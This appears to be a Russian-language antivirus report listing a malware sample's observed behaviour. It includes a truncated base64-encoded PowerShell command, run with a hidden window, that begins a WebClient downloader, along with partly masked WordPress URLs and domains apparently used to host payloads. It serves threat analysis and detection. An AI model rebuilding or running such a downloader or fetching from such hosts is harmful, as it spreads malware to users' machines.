Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZADgANQA0ADYAOAAwAD0AKAAnAHAANQA3ACcAKwAnADgAMAA4ADIAJwArACcAMwAnACkAOwAkAFMAXwA2ADcAMgA1AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGQAMAA4AF8ANAAwAF8AOQA9AC...
- 'wi####printers.com':80
- 'us###tefl.com':80
- 'ly#####icyogaexpert.com':80
- http://wi####printers.com/wp-includes/viq8I/
- http://us###tefl.com/wp-content/DqxlD/
- http://us###tefl.com/wp-content/DqxlD
- http://ly#####icyogaexpert.com/wp-content/llEmW3/
- DNS ASK wi####printers.com
- DNS ASK us###tefl.com
- DNS ASK ly#####icyogaexpert.com
- DNS ASK tr###llow.world
- DNS ASK bl##.##ncretedecor.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZADgANQA0ADYAOAAwAD0AKAAnAHAANQA3ACcAKwAnADgAMAA4ADIAJwArACcAMwAnACkAOwAkAFMAXwA2ADcAMgA1AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGQAMAA4AF8ANAAwAF8AOQA9AC...' (со скрытым окном)